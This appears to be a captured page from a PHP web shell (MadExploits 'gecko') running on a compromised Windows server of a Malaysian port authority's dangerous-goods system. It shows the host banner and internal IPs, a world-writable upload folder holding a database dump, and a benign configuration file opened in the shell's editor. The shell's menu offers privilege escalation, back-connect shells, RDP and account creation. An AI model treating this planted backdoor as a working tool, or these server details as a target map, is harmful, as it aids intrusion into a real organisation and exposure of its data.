Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
upload /
[ HOME SHELL ]
Name
Size
Permission
Action
22
[ DIR ]
drwxrwxrwx
36
[ DIR ]
drwxrwxrwx
application
[ DIR ]
drwxrwxrwx
lp
[ DIR ]
drwxrwxrwx
site
[ DIR ]
drwxrwxrwx
syarikat
[ DIR ]
drwxrwxrwx
syarikat_temp
[ DIR ]
drwxrwxrwx
vessel
[ DIR ]
drwxrwxrwx
.htaccess
59
B
-rw-rw-rw-
22document(20).pdf
5.32
KB
-rw-rw-rw-
LifeAfter_Nanoplastic_Conversi...
67.48
KB
-rw-rw-rw-
URS-eDGPENS-LPKmn.pdf
921.31
KB
-rw-rw-rw-
config(1).php
6.41
KB
-rw-rw-rw-
dbedgpens20200327.sql
34.02
KB
-rw-rw-rw-
document(20).pdf
5.32
KB
-rw-rw-rw-
document(21).pdf
5.33
KB
-rw-rw-rw-
dompdf_out.pdf
23.52
KB
-rw-rw-rw-
gecko.php
102.94
KB
-r--r--r--
index(1).php
1.52
KB
-rw-rw-rw-
index.html
0
B
-rw-rw-rw-
kodPort(1).php
15.75
KB
-rw-rw-rw-
logo_0_uYo_icon.ico
1.12
KB
-rw-rw-rw-
odbc(1).php
293
B
-rw-rw-rw-
odbc.php
293
B
-rw-rw-rw-
purpose.html
26
B
-rw-rw-rw-
purpose.json
6
B
-rw-rw-rw-
reports.pdf
7.84
KB
-rw-rw-rw-
userList(1).php
14.46
KB
-rw-rw-rw-
userList.php
14.46
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config(1).php
<?php /** * config.php * * Author: pixelcave * * Configuration file. It contains variables used in the template as well as the primary navigation array from which the navigation is created * */ /* Template variables */ $link_query = explode("&",$_SERVER['QUERY_STRING']); $base = (basename($_SERVER['PHP_SELF']) == 'index.php') ? basename($_SERVER['PHP_SELF']).'?'.$link_query[0] : basename($_SERVER['PHP_SELF']) ; $template = array( 'name' => 'eDGPENS LPKmn', 'version' => '0.1', 'author' => '', 'robots' => 'noindex, nofollow', 'title' => 'eDGPENS LPKmn', 'description' => 'Sistem eDEPENS Lembaga Pelabuhan Kemaman', // true enable page preloader // false disable page preloader 'page_preloader' => true, // 'navbar-default' for a light header // 'navbar-inverse' for a dark header 'header_navbar' => 'navbar-inverse', // '' empty for a static header/main sidebar // 'navbar-fixed-top' for a top fixed header/sidebars // 'navbar-fixed-bottom' for a bottom fixed header/sidebars 'header' => 'navbar-fixed-top', // '' empty for the default full width layout // 'fixed-width' for a fixed width layout (can only be used with a static header/main sidebar) 'layout' => '', // 'sidebar-visible-lg-mini' main sidebar condensed - Mini Navigation (> 991px) // 'sidebar-visible-lg-full' main sidebar full - Full Navigation (> 991px) // 'sidebar-alt-visible-lg' alternative sidebar visible by default (> 991px) (You can add it along with another class - leaving a space between) // 'sidebar-light' for a light main sidebar (You can add it along with another class - leaving a space between) 'sidebar' => 'sidebar-visible-lg-full', // '' Disable cookies (best for setting an active color theme from the next variable) // 'enable-cookies' Enables cookies for remembering active color theme when changed from the sidebar links (the next color theme variable will be ignored) 'cookies' => '', // '', 'classy', 'social', 'flat', 'amethyst', 'creme', 'passion', 'lpkmn' 'theme' => 'lpkmn', // Used as the text for the header link - You can set a value in each page if you like to enable it in the header 'header_link' => '', // The name of the files in the inc/ folder to be included in page_head.php - Can be changed per page if you // would like to have a different file included (eg a different alternative sidebar) 'inc_sidebar' => 'page_sidebar', 'inc_sidebar_alt' => '', 'inc_header' => 'page_header', // The following variable is used for setting the active link in the sidebar menu 'active_page' => $base ); /* Primary navigation array (the primary navigation will be created automatically based on this array, up to 3 levels deep) */ $primary_nav = array( array( 'name' => 'Dashboard', 'url' => 'index.php', 'icon' => 'gi gi-home' ), array( 'url' => 'separator', ), array( 'name' => 'Utility', 'icon' => 'fa fa-cog', 'sub' => array( array( 'name' => 'User Management', 'sub' => array( array( 'name' => 'Users', 'url' => 'index.php?page=kod/userList' ), array( 'name' => 'User Roles', 'url' => 'index.php?page=kod/userRole' ) ) ), array( 'name' => 'Master Codes', 'sub' => array( /* array( 'name' => 'Blank Page', 'url' => 'index.php?page=kod/blank_page' ), */ array( 'name' => 'Dangerous Goods', 'url' => 'index.php?page=kod/kodDG' ), array( 'name' => 'Countries', 'url' => 'index.php?page=kod/kodNegara' ), array( 'name' => 'Ports', 'url' => 'index.php?page=kod/kodPort' ), array( 'name' => 'Vessels', 'url' => 'index.php?page=kod/kodKapal' ), array( 'name' => 'Companies', 'url' => 'index.php?page=kod/kodSyarikat' ), array( 'name' => 'Company Types', 'url' => 'index.php?page=kod/kodJenisSyarikat' ), array( 'name' => 'Marine Facilties', 'url' => 'index.php?page=kod/kodMF' ), array( 'name' => 'Vessel Types', 'url' => 'index.php?page=kod/kodJenisKapal' ), array( 'name' => 'Operation Types', 'url' => 'index.php?page=kod/kodJenisOps' ), array( 'name' => 'Call Purposes', 'url' => 'index.php?page=kod/kodCP' ), array( 'name' => 'Packing Types', 'url' => 'index.php?page=kod/kodPacking' ), array( 'name' => 'CTU Types', 'url' => 'index.php?page=kod/kodCTU' ), array( 'name' => 'Dimensions', 'url' => 'index.php?page=kod/kodDimension' ), array( 'name' => 'Weight Units', 'url' => 'index.php?page=kod/kodWeight' ) ) )//, //array( // 'name' => 'Template Surat', // 'url' => 'page_ready_article.php' //) ) ) );
Close